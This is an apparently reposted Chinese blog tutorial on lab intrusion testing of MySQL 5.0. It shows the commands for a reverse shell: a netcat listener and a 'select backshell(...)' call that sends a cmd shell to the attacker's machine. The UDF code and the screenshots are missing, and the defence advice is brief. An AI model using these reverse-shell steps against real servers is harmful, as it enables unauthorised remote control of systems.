《Mysql必讀mysql5.0入侵測(cè)試以及防范方法分享》要點(diǎn):
本文介紹了Mysql必讀mysql5.0入侵測(cè)試以及防范方法分享,希望對(duì)您有用。如果有疑問,可以聯(lián)系我們。
MYSQL必讀在做了之前的SQL SERVER之后,便很想嘗試一下MYSQL的入侵測(cè)試已經(jīng)防范,與大家一起分享.
總的來說,我一直在用的是MYSQL,對(duì)MYSQL比較熟悉,相比較而言,感覺MYSQL更安全,這只是我自己胡亂猜想的,希望不要引起什么爭(zhēng)論神馬的...一本饅頭引發(fā)的血案...
MYSQL必讀正題之一
MYSQL必讀物理機(jī):Win7
虛擬機(jī):XP
MYSQL必讀給予mysql遠(yuǎn)程權(quán)限:
MYSQL必讀給物理機(jī)遠(yuǎn)程權(quán)限:
MYSQL必讀
MYSQL必讀物理機(jī)成功連接上:
MYSQL必讀
MYSQL必讀執(zhí)行侵入測(cè)試前(有圖有真相):
MYSQL必讀
MYSQL必讀執(zhí)行侵入測(cè)試后(有圖有真相):
MYSQL必讀
MYSQL必讀重啟前(有圖有真相):
MYSQL必讀
MYSQL必讀重啟后(有圖有真相):
MYSQL必讀
MYSQL必讀正題之二:
MYSQL必讀遠(yuǎn)程登錄之后寫入代碼,代碼在yyd.txt當(dāng)中,然后在MySql中寫入文件:
MYSQL必讀
MYSQL必讀Win7 打另外一個(gè)cmd,本地端口映射:nc -vv -l -p 端口號(hào)
MYSQL必讀虛擬機(jī)上:執(zhí)行映射:select backshell("物理機(jī)IP",端口號(hào));
MYSQL必讀這便執(zhí)行了3306端口反彈CMD
MYSQL必讀(沒圖了...用到了一個(gè)nc軟件執(zhí)行的映射)
yyd.txt大概內(nèi)容:
MYSQL必讀防范
MYSQL必讀
MYSQL必讀?
MYSQL必讀感覺有點(diǎn)亂,主要是分享了兩種方法入侵,但是防范那部分應(yīng)該是XP上的MySql服務(wù)關(guān)閉,但是早XP上做了好多測(cè)試,左后XP被我弄掛掉了....好丟臉,只好把Win7上的MySql服務(wù)拿出來了.
MYSQL必讀覺得主要還是遠(yuǎn)程連接的問題,“如果MySql不開啟遠(yuǎn)程連接的話我們還是朋友”,開玩笑,如果MySql不開啟遠(yuǎn)程連接的話入侵幾率會(huì)小的很多.
轉(zhuǎn)載請(qǐng)注明本頁(yè)網(wǎng)址:
http://www.snjht.com/jiaocheng/4017.html